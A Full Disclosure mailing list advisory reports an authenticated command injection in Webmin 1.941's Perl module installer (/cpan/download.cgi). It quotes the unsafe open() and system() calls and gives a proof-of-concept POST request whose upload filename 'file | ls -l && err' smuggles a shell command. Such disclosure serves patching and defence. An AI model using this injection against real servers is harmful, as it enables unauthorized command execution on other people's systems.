Full Disclosure mailing list archives
Webmin (Upload Module) Remote Command Injection Vulnerability
From: raki ben hamouda <raki7bh () gmail com>
Date: Wed, 6 May 2020 08:47:23 +0200
Document Title: =============== Webmin 1.941 (Install Module) Remote Command Injection Vulnerability Common Vulnerability Scoring System: ==================================== 8.5 Vulnerability Class: ==================== Command Injection Current Estimated Price: ======================== 2.000€ - 3.000€ Affected Product(s): ==================== Webmin Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote authenticated Command Injection vulnerability has been discovered in the official Webmin product . The security vulnerability allows a remote attacker with only permission to "Install Module Perl Component" to execute arbitrary Operating System Commands. this is due to no check performed on the user input "upload" parameter when it passed to open() perl function causing execution of any command . The vulnerability is located in the `/cpan/download.cgi` modules and the `upload` parameter of the module name to install. The security risk of the arbitrary RCE vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. Exploitation of the RCE web vulnerability requires a low privilege web-application user account and no user interaction. Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. =============================== ##When digging in code : I needed only to reach this line code to make it work : &install_error(&text('download_etar', "<tt>$tar</tt>")); However passing user input directly to open() is not a solution, this includes also all these lines : open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |"); system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null"); system("$cmd >/dev/null 2>&1 </dev/null"); %needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs; ============================= Request Method(s): [+] POST Vulnerable Module(s): [+] /cpan/download.cgi Vulnerable Parameter(s): [+] upload Server version 1.941 Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1-Attacker must have permission to the Install Perl Modules component 2-Go to "Others"->"Perl Modules"->"Install Modules"->Select 'From Uploaded File'->Pick Any file 3-attacker intercepts the request that follows : --- PoC Session Logs [POST] --- POST /cpan/download.cgi HTTP/1.1 Host: 192.168.239.129:10000 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-PJAX: true X-PJAX-Container: [data-dcontainer] X-PJAX-URL: download.cgi X-Requested-From: cpan X-Requested-From-Tab: webmin X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=--------------------------- 7478318236766462923988573986 Content-Length: 682 Origin: https://192.168.239.129:10000 Connection: close Referer: https://192.168.239.129:10000/cpan/?xnavigation=1 Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7 -----------------------------7478318236766462923988573986 Content-Disposition: form-data; name="cpan" -----------------------------7478318236766462923988573986 Content-Disposition: form-data; name="local" -----------------------------7478318236766462923988573986 Content-Disposition: form-data; name="source" 1 -----------------------------7478318236766462923988573986 Content-Disposition: form-data; name="upload"; filename="file | ls -l && err" Content-Type: [nothing here] [Nothing Here] -----------------------------7478318236766462923988573986 Content-Disposition: form-data; name="url" -----------------------------7478318236766462923988573986-- 4-Modify the "upload" parameter with string : "file | ls -l && err" ##Successfully reproduced the Vulnerability. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Webmin (Upload Module) Remote Command Injection Vulnerability raki ben hamouda (May 08)